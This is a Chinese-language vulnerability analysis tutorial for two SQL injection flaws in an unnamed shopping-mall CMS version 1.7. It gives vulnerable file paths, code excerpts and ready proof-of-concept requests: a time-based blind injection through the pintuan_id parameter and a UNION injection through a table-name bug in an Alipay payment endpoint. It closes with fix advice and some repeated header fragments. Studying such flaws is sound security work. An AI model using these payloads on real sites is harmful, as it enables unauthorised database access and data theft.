某商城CMS v1.7前台SQL注入漏洞分析教学文档<\/h1>

漏洞概述<\/h2>

某商城CMS v1.7版本中存在两处前台SQL注入漏洞：<\/p>

基于时间盲注的SQL注入漏洞（pintuan_check函数处）<\/li>

基于UNION查询的SQL注入漏洞（order_table函数处）<\/li> <\/ol>

漏洞一：pintuan_check时间盲注<\/h2>

漏洞位置<\/h3>
`module\/index\/cart.php<\/code> 12-32行处的pintuan分支处理逻辑<\/p>`

漏洞分析流程<\/h3>


参数处理<\/strong>：<\/p>

$product_id<\/code>, $product_guid<\/code>, $product_num<\/code>都经过intval()<\/code>转换<\/li>
$_g_pintuan_id<\/code>参数未经过任何过滤处理<\/li>
<\/ul>
<\/li>

关键漏洞点<\/strong>：<\/p>
if<\/span> ($act ==<\/span> 'pintuan'<\/span> &&<\/span> !<\/span>pintuan_check<\/span>($product['huodong_id'<\/span>], $_g_pintuan_id))
<\/span><\/span><\/code><\/pre><\/li>

函数调用链<\/strong>：<\/p>
pintuan_check() → db->pe_select() → db->sql_select() → db->query() → mysqli_query()
<\/code><\/pre>
<\/li>

pe_select函数分析<\/strong>：<\/p>
public<\/span> function<\/span> pe_select<\/span>($table, $where =<\/span> ''<\/span>, $field =<\/span> '*'<\/span>) {
<\/span><\/span>    $sqlwhere =<\/span> $this-><\/span>_dowhere<\/span>($where);
<\/span><\/span>    return<\/span> $this-><\/span>sql_select<\/span>("select <\/span>{<\/span>$field}<\/span> from `"<\/span>.<\/span>dbpre<\/span>.<\/span>"<\/span>{<\/span>$table}<\/span>` <\/span>{<\/span>$sqlwhere}<\/span> limit 1"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

_dowhere函数处理<\/strong>：<\/p>

将键名中的反引号替换为空<\/li>
处理order by<\/code>和group by<\/code>语句<\/li>
最终拼接WHERE条件<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h3>


构造时间盲注POC<\/strong>：<\/p>
pintuan_id=' and if((1=1),sleep(5)),1)-- 1
<\/code><\/pre>
<\/li>

最终执行的SQL语句<\/strong>：<\/p>
select<\/span> *<\/span> from<\/span> `<\/span>pe_pintuan`<\/span> where<\/span> `<\/span>pintuan_id`<\/span> =<\/span> ''<\/span> and<\/span> if<\/span>((1<\/span>=<\/span>1<\/span>),sleep(5<\/span>)),1<\/span>)-- 1' limit 1
<\/span><\/span><\/span><\/code><\/pre><\/li>

改进POC（解决空表问题）<\/strong>：<\/p>
\/index.php?mod=cart&act=pintuan&guid=1&id=1&num=&pintuan_id=' and (if((1=1),(select * from (select sleep(5))a),1))-- 1
<\/code><\/pre>
<\/li>
<\/ol>
漏洞二：order_table UNION注入<\/h2>
漏洞位置<\/h3>
include\/plugin\/payment\/alipay\/pay.php<\/code> 34-35行<\/p>
漏洞分析流程<\/h3>


参数处理<\/strong>：<\/p>
$order_id =<\/span> pe_dbhold<\/span>($_g_id);
<\/span><\/span>$order =<\/span> $db-><\/span>pe_select<\/span>(order_table<\/span>($order_id), array<\/span>('order_id'<\/span>=><\/span>$order_id));
<\/span><\/span><\/code><\/pre><\/li>

pe_dbhold函数分析<\/strong>：<\/p>

对参数进行转义处理<\/li>
使用addslashes()<\/code>或addslashes(htmlspecialchars())<\/code><\/li>
<\/ul>
<\/li>

order_table函数分析<\/strong>：<\/p>
function<\/span> order_table<\/span>($id) {
<\/span><\/span>    if<\/span> (stripos<\/span>($id, '_'<\/span>) !==<\/span> false<\/span>) {
<\/span><\/span>        $id_arr =<\/span> explode<\/span>('_'<\/span>, $id);
<\/span><\/span>        return<\/span> "order_<\/span>{<\/span>$id_arr[0<\/span>]}<\/span>"<\/span>;
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        return<\/span> "order"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

注入原理<\/strong>：<\/p>

通过控制order_table<\/code>返回值来注入表名<\/li>
表名部分不受引号限制，可绕过转义<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h3>


构造UNION注入POC<\/strong>：<\/p>
\/include\/plugin\/payment\/alipay\/pay.php?id=pay` where 1=1 union select user(),2,3,4,5,6,7,8,9,10,11,12-- _
<\/code><\/pre>
<\/li>

最终执行的SQL语句<\/strong>：<\/p>
select<\/span> *<\/span> from<\/span> `<\/span>pe_order_pay`<\/span> where<\/span> 1<\/span>=<\/span>1<\/span> union<\/span> select<\/span> user<\/span>(),2<\/span>,3<\/span>,4<\/span>,5<\/span>,6<\/span>,7<\/span>,8<\/span>,9<\/span>,10<\/span>,11<\/span>,12<\/span>-- _` where `order_id` = 'pay` where 1=1 union select user(),2,3,4,5,6,7,8,9,10,11,12-- _' limit 1
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞修复建议<\/h2>


对所有用户输入参数进行严格过滤<\/strong>：<\/p>

使用白名单机制验证参数<\/li>
对特殊字符进行转义或过滤<\/li>
<\/ul>
<\/li>

修改数据库操作函数<\/strong>：<\/p>

在pe_select<\/code>等数据库操作函数内部加入参数过滤逻辑<\/li>
避免安全函数与DB操作函数分离的设计<\/li>
<\/ul>
<\/li>

具体修复方案<\/strong>：<\/p>

对pintuan_check<\/code>函数的$pintuan_id<\/code>参数进行过滤<\/li>
修改order_table<\/code>函数，增加输入验证<\/li>
使用预处理语句替代直接SQL拼接<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
这两处SQL注入漏洞的主要成因：<\/p>

第一处：未对可控参数$_g_pintuan_id<\/code>进行过滤<\/li>
第二处：虽然对参数进行了转义，但通过表名注入绕过了防护<\/li>
<\/ol>
根本问题在于安全防护函数与DB操作函数分离的设计，容易遗漏参数过滤。建议在数据库操作函数内部集成安全过滤机制。<\/p>

某商城CMS v1.7前台SQL注入漏洞分析教学文档<\/h1>

漏洞一：pintuan_check时间盲注<\/h2>

漏洞位置<\/h3> module\/index\/cart.php<\/code> 12-32行处的pintuan分支处理逻辑<\/p>

漏洞二：order_table UNION注入<\/h2>

漏洞位置<\/h3> include\/plugin\/payment\/alipay\/pay.php<\/code> 34-35行<\/p>

漏洞位置<\/h3>
`module\/index\/cart.php<\/code> 12-32行处的pintuan分支处理逻辑<\/p>`

漏洞位置<\/h3>
`include\/plugin\/payment\/alipay\/pay.php<\/code> 34-35行<\/p>`